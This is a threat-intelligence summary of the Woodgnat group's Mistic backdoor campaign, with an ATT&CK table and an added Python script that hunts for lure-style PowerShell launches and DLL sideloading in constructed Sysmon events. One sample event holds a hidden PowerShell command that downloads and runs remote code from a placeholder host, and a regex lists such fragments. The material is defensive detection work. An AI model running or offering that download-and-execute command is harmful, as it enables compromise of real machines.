EXECUTIVE SUMMARY
A financially motivated cybercrime group known as Woodgnat is actively deploying a new stealthy backdoor called Mistic alongside the ModeloRAT remote access trojan. This initial access broker focuses on gaining durable entry into enterprise networks to sell access to ransomware affiliates rather than deploying final payloads themselves. The campaign targets organizations across diverse sectors, including insurance, education, and professional services, with a primary goal of data theft and enabling subsequent ransomware operations. Their opportunistic approach involves casting a wide net to identify high-value victims for their criminal partners.
Attackers initiate intrusions by tricking users into executing malicious commands through social engineering lures on compromised websites or fraudulent external Teams messages posing as IT support. Once inside, the group uses a technique called DLL sideloading to execute the Mistic backdoor, which runs entirely in memory to avoid leaving traces on the disk. The malware establishes persistence by masquerading as legitimate remote access software and uses standard system tools for reconnaissance and lateral movement. Operators maintain control through encrypted command channels and can wipe their tracks using a built-in kill switch.
This threat poses significant risks because the fileless nature of the backdoor allows attackers to remain undetected for long periods, facilitating extensive data staging before ransomware deployment. Defending against this campaign requires organizations to strictly enforce application allowlisting and monitor for unusual PowerShell activity or unsolicited remote support requests. Security teams should verify the legitimacy of external communications before following instructions and ensure endpoint detection tools are configured to identify memory-resident threats. Regular offline backups remain critical to recovering data if access brokers successfully hand off the network to ransomware operators.
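The two behaviours described above, a copy-paste PowerShell lure executed by the user from a web page or a fake IT-support Teams chat, and a DLL sideloaded into a binary masquerading as remote access software, are exactly what the recommended monitoring has to catch. The following Python is an added example, not code from the Symantec report and not Woodgnat tooling: it runs two simple detectors over constructed Sysmon-shaped records (Event ID 1 ProcessCreate and Event ID 7 ImageLoad; field names follow Sysmon, all values are invented) and knows nothing about Mistic's real file names, which the summary does not give.

```python
"""Hunt for two Woodgnat-style behaviours in endpoint telemetry:
(1) an interpreter launched interactively with lure-like arguments, the shape of a
    pasted ClickFix / fake-IT-support command, and
(2) an unsigned DLL loaded from a non-system directory beside its host executable,
    the shape of DLL sideloading.

Added example; the events are constructed Sysmon-style dicts, not captured data."""
import re
from pathlib import PureWindowsPath

# Interpreters a copy-paste lure typically tells the victim to run via Win+R or a terminal.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parents that indicate a user-driven launch rather than a script, service or scheduled task.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Argument fragments common to pasted lures: hidden window, base64 payload, remote fetch + eval.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|"
    r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b|curl\s+\S+\s*\|)",
    re.IGNORECASE,
)
# Locations Windows and installers own; a DLL resolved from here is normal, not sideloaded.
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _basename(path):
    return PureWindowsPath(path).name.lower()


def flag_lure_execution(ev):
    """ProcessCreate check: return a reason string if the event looks like a pasted lure, else None."""
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    if image not in INTERPRETERS or parent not in INTERACTIVE_PARENTS:
        return None
    match = SUSPICIOUS_ARGS.search(ev["CommandLine"])
    if not match:
        return None
    return f"{image} launched from {parent} with lure-like argument {match.group(0)!r}"


def flag_sideload(ev):
    """ImageLoad check: unsigned DLL, same directory as its host EXE, outside system/program dirs."""
    dll, exe = PureWindowsPath(ev["ImageLoaded"]), PureWindowsPath(ev["Image"])
    if dll.suffix.lower() != ".dll":
        return None
    same_dir = dll.parent == exe.parent            # PureWindowsPath compares case-insensitively
    user_writable = not str(dll).lower().startswith(SYSTEM_DIRS)
    unsigned = ev.get("Signed", "true").lower() != "true"
    if same_dir and user_writable and unsigned:
        return f"unsigned {dll.name} loaded by {exe.name} from user-writable {dll.parent}"
    return None


def hunt(events):
    """Run the right detector per event type; return (event_index, reason) pairs."""
    hits = []
    for i, ev in enumerate(events):
        reason = flag_lure_execution(ev) if ev["EventID"] == 1 else flag_sideload(ev)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample telemetry: two process creations, two image loads. Paths and the
# hostname-free URL are invented and are not indicators from the report.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/fix)"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\Support\helper.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\Support\version.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\Vendor\tool.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for index, reason in hunt(EVENTS):
        print(f"event {index}: {reason}")
```

Only the explorer-spawned hidden PowerShell (event 0) and the unsigned DLL beside a temp-folder executable (event 2) are flagged; the scheduled inventory script and the system version.dll load pass. The sideload rule deliberately keys on the DLL being unsigned rather than on the host being malicious, because in a sideloading chain the host is usually a legitimate signed binary, so a signed host loading an unsigned DLL from a user-writable path is the signal worth reviewing, and allowlisting that blocks unsigned DLLs in user-writable locations is the matching preventive control.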
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1189 | Drive-by Compromise | — |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1574.001 | Hijack Execution Flow | DLL Search Order Hijacking |
| Defense Evasion | T1070.004 | Indicator Removal | File Deletion |
| Credential Access | T1558.003 | Steal or Forge Kerberos Tickets | Kerberoasting |
| Lateral Movement | T1047 | Windows Management Instrumentation | — |
| Collection | T1113 | Screen Capture | — |
| Command and Control | T1568.002 | Dynamic Resolution | Domain Generation Algorithms |
| Exfiltration | T1048.003 | Exfiltration Over Alternative Protocol | Exfiltration Over Unencrypted Non-C2 Protocol |
REFERENCES:
The original report contains further technical details:
https://www.security.com/threat-intelligence/new-mistic-backdoor-modelorat